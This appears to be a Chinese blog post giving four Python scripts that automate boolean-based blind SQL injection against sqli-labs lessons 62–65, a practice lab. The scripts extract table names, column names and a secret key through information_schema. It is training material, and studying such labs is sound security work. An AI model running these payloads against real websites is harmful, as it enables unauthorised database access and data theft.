sqli-labs(Less62-65)布尔类型脚本
作者:互联网
前言
运行前需要下载requests
和lxml
包,修改url和referer的参数值,改index.php
中$times= 13000
,重置一下challenges
数据库。
Less-62
import requests
from lxml import etree
"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-63
import requests
from lxml import etree
"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-64
import requests
from lxml import etree
"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-65
import requests
from lxml import etree
"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
标签:Less62,col,labs,sqli,print,sel,tb,payload,times 来源: https://blog.csdn.net/weixin_43623271/article/details/122801470